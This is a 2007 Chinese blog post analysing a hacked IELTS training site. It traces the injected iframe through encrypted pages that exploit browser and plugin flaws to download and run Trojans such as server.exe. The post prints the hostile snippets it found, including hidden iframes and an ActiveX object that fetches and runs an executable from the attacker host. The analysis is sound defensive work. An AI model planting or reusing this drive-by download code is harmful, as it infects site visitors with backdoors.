某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a/ Backdoor.Win32.Hupigon.jmq
endurer 原创
2007-09-12 第1版
2007-09-13 第2版 补充瑞星对 server.exe 的回复
网页包含代码:
/---
<iframe src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
---/
hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script src=hxxp://c*s.cs*kic**k.cn/cs/c.js></script><frameset rows="444,0" cols="*">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index0.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index2.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/dns.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ie.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ie1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/xp.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.asp" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ka.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/3800hk.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
---/
hxxp://c*s.cs*kic**k.cn/cs/c.js 的功能是检测 cookies变量 npconfig,若不存在则创建,并输出代码:
/---
<script language="javascript" src="hxxp://c*s.cs*kic**k.cn/cs/nc.js"></script>
---/
hxxp://c*s.cs*kic**k.cn/cs/nc.js 检测 MS06-014 漏洞,若存在则输出代码:
/---
<iframe width="0" height="0" src="hxxp://c*s.cs*kic**k.cn/cs/logo.htm"></iframe>
---/
否则输出代码:
/---
<iframe width="0" height="0" src="hxxp://c*s.cs*kic**k.cn/cs/file.htm"></iframe>
---/
hxxp://c*s.cs*kic**k.cn/cs/logo.htm 内容为:
/---
<link rel="stylesheet" href="GnYiVsAQ.CSS">
<Script language="Javascript" src="haha.js"></Script>
<IFRAME frameBorder=no height=1 src="2.htm" width=1></IFRAME>
---/
GnYiVsAQ.CSS 内容为:
/---
<STYLE type=text/css>
<!--
body {CURSOR: url('lo.jpg')}
--></STYLE>
---/
hxxp://c*s.cs*kic**k.cn/cs/lo.jpg 未能打开。
hxxp://c*s.cs*kic**k.cn/cs/haha.js 的功能是利用 ThunderServer.webThunder,调用IE 打开exec.htm,运行IE缓存中的 update[1].exe, 创建文件 C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Windows.hta。
hxxp://c*s.cs*kic**k.cn/cs/exec.htm 包含代码:
/---
<script src="sf.exe"></script>
---/
sf.exe 未能下载。
hxxp://c*s.cs*kic**k.cn/cs/2.htm 输出escape()加密的代码:
/---
<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=2
width=0 autostart=true>
---/
music.smi 为漏洞利用代码,瑞星报为:Hack.Exploit.Agent.dk
hxxp://c*s.cs*kic**k.cn/cs/file.htm 包含代码:
/---
<SCRIPT language="JScript.Encode" src=file.jpg></script>
---/
hxxp://c*s.cs*kic**k.cn/cs/file.jpg 的内容解密后为 下载 hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg,保存为~tmp.exe,通过 cmd.exe /c 来运行。
hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg 未能下载。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script language=javascript src="ta.js"></script>
---/
ta.js 下载 hxxp://www.be**a**utyco**nce*pt.cn/asp/server.exe,保存为 hk.exe,并运行。
瑞星报为 Trojan.DL.JS.Small.jd
文件说明符 : D:/test/server.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-11 23:35:50
修改时间 : 2007-9-11 23:35:56
访问时间 : 2007-9-11 23:37:9
大小 : 950784 字节 928.512 KB
MD5 : 0856b705b41ba7c140b1772fc589b531
HSA1: 3DFF4F937FE7020AEFB70295281283EC75F6BF63
Scanned file: server.exe - Infected
|
主 题: |
病毒上报邮件分析结果-流水单号:20070911234829077058 |
发件人: |
"" <send@rising.net.cn>
<script language="JavaScript" type="text/javascript">
<!--
var aAddAdress = document.getElementById("aAddAdress");
aAddAdress.href = document.guideform.guidelinks.options[5].value;
var aDeleteAdress = document.getElementById("aDeleteAdress");
aDeleteAdress.href = document.guideform.guidelinks.options[4].value;
document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[5]);
document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[4]);
//-->
</script> |
发送时间:2007.09.13 11:22
|
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:server.exe
病毒名:
Dropper.Win32.BlackHole.a 您所上报的病毒文件将在19.40.32版本中处理解决。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index0.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,从而
1。下载 server.exe,保存为 cike.exe,创建 cike.vbs 来运行。
2。下载 hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg,保存为 taskmgr.exe,创建 taskmgr.vbs 来运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index2.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是检测 cookies 变量 Chg 是否存在,不存在则创建,并利用 APPLET 修改注册表 HKCU/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3/1004,并打开网页 ActiveX1.htm
ActiveX1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script src=http://cs~cskick~cn/cs/c~js></script><!doctype html public "-//w3c//dtd html 4~0 transitional//en">
<html><head>
<meta http-equiv=content-type content="text/html; charset=gb2312">
<script language=javascript>
sofzl="<object id=\"sofzlcn\" width=0 height=0 type=\"application/x-oleobject\""
sofzl+="codebase=\"http://www~beautyconcept~cn/asp/server~exe#microsoft=1,1,1,1\">"
sofzl+="<param name=\"_microsoft\" value=\"2008\">"
sofzl+="</object>"
document~open();
document~clear();
document~writeln(sofzl);
document~close();
</script>
---/
hxxp://www.be**a**utyco**nce*pt.cn/asp/dns.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 Cuteqq_Cn.exe并运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/ie.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 Cuteqq_Cn.exe,创建 Cuteqq_CN.vbs 来运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/ie1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 sofzlcn.exe,创建 Cuteqq_CN.vbs 来运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/xp.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是下载 server.exe,保存为 sofzlcn.exe 并运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index.asp 包含代码:
/---
<script type="text/javascript" src="index1.asp"></script>
RUN("hxxp://www.be**a**utyco**nce*pt.cn/asp/"
);</script>
---/
hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.asp 未能打开。
hxxp://www.be**a**utyco**nce*pt.cn/asp/ka.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是 下载 server.exe,保存为 svchost.exe 并运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/3800hk.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出QQ溢出漏洞的代码。
分享到:
相关推荐
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
Gridinsoft Trojan Killer木马克星是专门来禁用/删除没有用户不必手动编辑系统文件或注册表的恶意软件。该方案还删除一些恶意软件进行了一些标准的防病毒扫描器忽略额外的系统修改。 Trojan Killer扫描所有的...
NULL 博文链接:https://polygoncell.iteye.com/blog/733264
语言:English ...从http://eye-dropper.kepi.cz/分叉。原始扩展名很棒,我建议支持作者! 我添加了:1.转换为Tailwind 2.自动复制到剪贴板由Freepik(https://www.freepik.com)从www.flaticon.com制作的图标
生成被最小化,并且文件名包括哈希值。 您的应用已准备好进行部署! 有关更多信息,请参见关于的部分。npm run eject 注意:这是单向操作。 eject ,您将无法返回! 如果您对构建工具和配置选择不满意,则可以随时...
Office的客户端代码执行3.1.3.1:JavaScript 3.2.2.1:MyMarco 3.2.3.1:MyMarco和PowerShell 3.4.3.1:从VBA调用Win32 API 留言框A 查找窗口A 3.5.1.1:从PowerShell调用Win32 API 3.5.2.1:将Shellcode Runner...
用上了 foobar2000 以后,就总喜欢创建各种各样的播放列表,来满足每个时候的需要,而 M3U Dropper 正是一个创建 m3u 播放列表的工具,它可以通过拖曳文件(夹),排出你想要的播放列表,按一下最下面中间的按钮,就...
Document Dropper是一种自动在目录中移动文件的工具。 规则确定文件的移动位置。 用户手册:https://github.com/MasterZydra/DocumentDropper/wiki新增:排序和过滤规则将反斜杠/斜杠替换为平台特定的尾随字符
滴管node.js(PoC) 作者:丹妮尔·贝拉维斯塔(Daniele Bellavista) node.js中用于渗透测试的滴管不完整。... 成功编译后,该模块将在build/Release/dropper.node 。 在主目录中复制dropper.node 。 cd E:\p
import MyImage from '../images/image.jpg' ; ReactDOM . render ( < Dropper xss=removed xss=removed xss=removed xss=removed xss=removed xss=removed xss=removed> { // Based on the event
Stego_Dropper 一个基于python的dropper,它使用隐写术和HTTP上... 这个工具的灵感来自: ://lockboxx.blogspot.com/2015/02/python-steganographic-payload-dropper.html 该工具大量重新实现和使用: : 要求: OpenCV
dropper.py 可以用pyinstaller 编译成exe。 有两种操作模式:self-contained 和 URL-drop。 usage: ./cryptbinder.py [options] optional arguments: -h, --help show this help message and exit -m M...
PE文件监控(PE Dropper Monitor) 是专业用来监控PE文件的变动的工具 常见的EXE、DLL、OCX、SYS、COM都是PE文件 更新日志: [02-06-2011] - v1.4.0.0 Added right-click->"Clipboard" to copy item details to ...
Document Dropper 是一种自动移动目录中文件的工具。 规则确定文件移动到何处。 用户手册:https://github.com/MasterZydra/DocumentDropper/wiki 新功能:排序和过滤规则 用平台特定的尾随字符替换反斜杠/斜杠
本文介绍Dropper.Win32.Agent.bd病毒资料及清除方法。
依赖关系BARF(实际上是这个 fork[1]) 派尔夫工具例子 from dropper import dropperdr = dropper.dropper('/bin/mv')dr.analyze_all()dr.add_shared_object('/lib/x86_64-linux-gnu/libc.so.6')dr.set_function_for...
导航到C驱动器并安装01.vcredist_x862012.exe 在CMD中打开开始菜单类型,然后以管理员身份运行。 在命令行控制台中,输入cd /并按Enter键 输入02.tradelistfix.bat然后输入 输入03.install.bat然后输入 输入exit ...
下载好后,相关的使用操作请看文章:http://blog.csdn.net/qq_33679504/article/details/78663119 按照步骤绝对可以使用,不会的请给我留言
本例是DROPPER结合.NET做的一个小例子。给初学者一个帮助……数据库是ACCESS的……